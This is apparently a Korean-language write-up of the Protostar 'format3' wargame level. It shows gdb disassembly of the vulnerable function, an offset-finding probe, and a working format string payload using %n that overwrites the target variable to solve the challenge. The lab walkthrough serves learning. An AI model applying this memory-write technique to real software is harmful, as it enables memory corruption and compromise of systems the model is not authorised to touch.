(gdb) disas vuln
Dump of assembler code for function vuln:
0x08048467 <vuln+0>: push ebp
0x08048468 <vuln+1>: mov ebp,esp
0x0804846a <vuln+3>: sub esp,0x218
0x08048470 <vuln+9>: mov eax,ds:0x80496e8
0x08048475 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x08048479 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x08048481 <vuln+26>: lea eax,[ebp-0x208]
0x08048487 <vuln+32>: mov DWORD PTR [esp],eax
0x0804848a <vuln+35>: call 0x804835c <fgets@plt> //fgets(buffer, 0x200, stdin)
0x0804848f <vuln+40>: lea eax,[ebp-0x208]
0x08048495 <vuln+46>: mov DWORD PTR [esp],eax
0x08048498 <vuln+49>: call 0x8048454 <printbuffer> //arg = stdin
0x0804849d <vuln+54>: mov eax,ds:0x80496f4 //target
0x080484a2 <vuln+59>: cmp eax,0x1025544
0x080484a7 <vuln+64>: jne 0x80484b7 <vuln+80> //if(target != 0x1025544){ jmp 80 }
0x080484a9 <vuln+66>: mov DWORD PTR [esp],0x80485a0 //"you have modified the target :)"
0x080484b0 <vuln+73>: call 0x804838c <puts@plt>
0x080484b5 <vuln+78>: jmp 0x80484ce <vuln+103>
0x080484b7 <vuln+80>: mov edx,DWORD PTR ds:0x80496f4
0x080484bd <vuln+86>: mov eax,0x80485c0
0x080484c2 <vuln+91>: mov DWORD PTR [esp+0x4],edx
0x080484c6 <vuln+95>: mov DWORD PTR [esp],eax
0x080484c9 <vuln+98>: call 0x804837c <printf@plt>
0x080484ce <vuln+103>: leave
0x080484cf <vuln+104>: ret
End of assembler dump.
(gdb) disas printbuffer
Dump of assembler code for function printbuffer:
0x08048454 <printbuffer+0>: push ebp
0x08048455 <printbuffer+1>: mov ebp,esp
0x08048457 <printbuffer+3>: sub esp,0x18
0x0804845a <printbuffer+6>: mov eax,DWORD PTR [ebp+0x8]
0x0804845d <printbuffer+9>: mov DWORD PTR [esp],eax
0x08048460 <printbuffer+12>: call 0x804837c <printf@plt> //printf(buffer)
0x08048465 <printbuffer+17>: leave
0x08048466 <printbuffer+18>: ret
End of assembler dump.
target을 0x1025544로 바꾸면 된다.
user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+"%x_"*12' | ./format3
AAAA0_bffff5e0_b7fd7ff4_0_0_bffff7e8_804849d_bffff5e0_200_b7fd8420_bffff624_41414141_
target is 00000000 :(
버퍼는 +12에 위치한다.
이걸 이제 10진수로 바꿔서 나타내면 16930116인데 이거 넣으면 될듯
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08"+"%16930112d"+"%12$n"'
| ./format3
...중략...
0
you have modified the target :)